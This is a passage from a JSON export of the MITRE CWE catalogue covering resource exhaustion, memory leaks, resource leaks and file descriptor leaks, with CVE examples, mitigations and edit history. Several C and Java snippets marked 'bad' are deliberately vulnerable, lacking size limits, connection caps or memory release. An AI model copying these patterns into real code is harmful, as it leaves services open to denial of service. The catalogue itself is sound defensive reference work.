0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length &gt; 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &amp;message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length &gt; 0) &amp;&amp; (length &lt; MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2874","Description":"Product allows attackers to cause a crash via a large number of connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2874"},{"Reference":"CVE-2009-1928","Description":"Malformed request triggers uncontrolled recursion, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-2121","Description":"TCP implementation allows attackers to consume CPU and prevent new connections using a TCP SYN flood attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2121"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2006-1173","Description":"Mail server does not properly handle deeply nested multipart MIME messages, leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1173"},{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Resource exhaustion (file descriptor, disk space, sockets, ...)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":10,"Entry_Name":"Denial of Service"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"492"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}}]},"Notes":{"Note":[{"#text":"\\"Resource consumption\\" could be interpreted as a consequence instead of an insecure behavior, so this entry is being considered for modification.  It appears to be referenced too frequently when more precise mappings are available.  Some of its children, such as CWE-771, might be better considered as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}},{"attr":{"@_Type":"Other"},"xhtml:p":["Database queries that take a long time to process are good DoS targets. An attacker would have to write a few lines of Perl code to generate enough traffic to exceed the site\'s ability to keep up. This would effectively prevent authorized users from using the site at all. Resources can be exploited simply by ensuring that the target machine must do much more work and consume more resources in order to service a request than the attacker must do to initiate a request.","A prime example of this can be found in old switches that were vulnerable to \\"macof\\" attacks (so named for a tool developed by Dugsong). These attacks flooded a switch with random IP and MAC address combinations, therefore exhausting the switch\'s cache, which held the information of which port corresponded to which MAC addresses. Once this cache was exhausted, the switch would fail in an insecure way and would begin to act simply as a hub, broadcasting all traffic on all ports and allowing for basic sniffing attacks."]}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Name, Relationships, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Exhaustion","attr":{"@_Date":"2008-10-14"}},{"#text":"Uncontrolled Resource Consumption (aka \'Resource Exhaustion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Uncontrolled Resource Consumption (\'Resource Exhaustion\')","attr":{"@_Date":"2019-01-03"}}]}},"401":{"attr":{"@_ID":"401","@_Name":"Missing Release of Memory after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory.","Extended_Description":"This is often triggered by improper handling of malformed data or unexpectedly interrupted sessions.  In some languages, developers are responsible for tracking memory allocation and releasing the memory.  If there are no more pointers or references to the memory, then it can no longer be tracked and identified for release.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"Memory leaks have two common and sometimes overlapping causes:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances","Confusion over which part of the program is responsible for freeing the memory"]}}}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Most memory leaks result in general software reliability problems, but if an attacker can intentionally trigger a memory leak, the attacker might be able to launch a denial of service attack (by crashing or hanging the program) or take advantage of other unexpected program behavior resulting from a low memory condition."},{"Scope":"Other","Impact":"Reduce Performance"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":["Architecture and Design","Build and Compilation"],"Description":"The Boehm-Demers-Weiser Garbage Collector or valgrind can be used to detect leaks in code.","Effectiveness_Notes":"This is not a complete solution as it is not 100% effective."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following C function leaks a block of allocated memory if the call to read() does not return the expected number of bytes:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getBlock(int fd) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char* buf = (char*) malloc(BLOCK_SIZE);if (!buf) {}if (read(fd, buf, BLOCK_SIZE) != BLOCK_SIZE) {}return buf;","xhtml:br":["","",""],"xhtml:div":[{"#text":"return NULL;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return NULL;","xhtml:br":""}}]}}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3119","Description":"Memory leak because function does not free() an element of a data structure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3119"},{"Reference":"CVE-2004-0427","Description":"Memory leak when counter variable is not decremented.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0427"},{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2005-3181","Description":"Kernel uses wrong function to release a data structure, preventing data from being properly tracked by other code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3181"},{"Reference":"CVE-2004-0222","Description":"Memory leak via unknown manipulations as part of protocol test suite.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222"},{"Reference":"CVE-2001-0136","Description":"Memory leak via a series of the same command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0136"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Memory leak"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Memory Leak"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to deallocate data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC04-J","Entry_Name":"Do not leak memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP38","Entry_Name":"Failure to Release Memory"},{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-14"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-390"}},{"attr":{"@_External_Reference_ID":"REF-391"}},{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-14"}}]},"Notes":{"Note":[{"#text":"This is often a resultant weakness due to improper handling of malformed data or early termination of sessions.","attr":{"@_Type":"Relationship"}},{"#text":"\\"memory leak\\" has sometimes been used to describe other kinds of issues, e.g. for information leaks in which the contents of memory are inadvertently leaked (CVE-2003-0400 is one such example of this terminology conflict).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, References, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Name, References, Relationships, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Memory Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Release Memory Before Removing Last Reference (aka \'Memory Leak\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Release Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2010-12-13"}},{"#text":"Improper Release of Memory Before Removing Last Reference (\'Memory Leak\')","attr":{"@_Date":"2019-01-03"}},{"#text":"Improper Release of Memory Before Removing Last Reference","attr":{"@_Date":"2019-06-20"}}]}},"402":{"attr":{"@_ID":"402","@_Name":"Transmission of Private Resources into a New Sphere (\'Resource Leak\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes resources available to untrusted parties when those resources are only intended to be accessed by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Leak"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Resource leaks"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Leaks","attr":{"@_Date":"2008-04-11"}},{"#text":"Transmission of Private Resources into a New Sphere (aka \'Resource Leak\')","attr":{"@_Date":"2009-05-27"}}]}},"403":{"attr":{"@_ID":"403","@_Name":"Exposure of File Descriptor to Unintended Control Sphere (\'File Descriptor Leak\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.","Extended_Description":"When a new process is forked or executed, the child process inherits any open file descriptors. When the child process has fewer privileges than the parent process, this might introduce a vulnerability if the child process can access the file descriptor but does not have the privileges to access the associated file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File descriptor leak","Description":"While this issue is frequently called a file descriptor leak, the \\"leak\\" term is often used in two different ways - exposure of a resource, or consumption of a resource. Use of this term could cause confusion."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0740","Description":"Server leaks a privileged file descriptor, allowing the server to be hijacked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740"},{"Reference":"CVE-2004-1033","Description":"File descriptor leak allows read of restricted files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1033"},{"Reference":"CVE-2000-0094","Description":"Access to restricted resource using modified file descriptor for stderr.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0094"},{"Reference":"CVE-2002-0638","Description":"Open file descriptor used as alternate channel in complex race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0638"},{"Reference":"CVE-2003-0489","Description":"Program does not fully drop privileges after creating a file descriptor, which allows access to the descriptor via a separate vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0489"},{"Reference":"CVE-2003-0937","Description":"User bypasses restrictions by obtaining a file descriptor then calling setuid program, which does not close the descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0937"},{"Reference":"CVE-2004-2215","Description":"Terminal manager does not properly close file descriptors, allowing attackers to access terminals of other 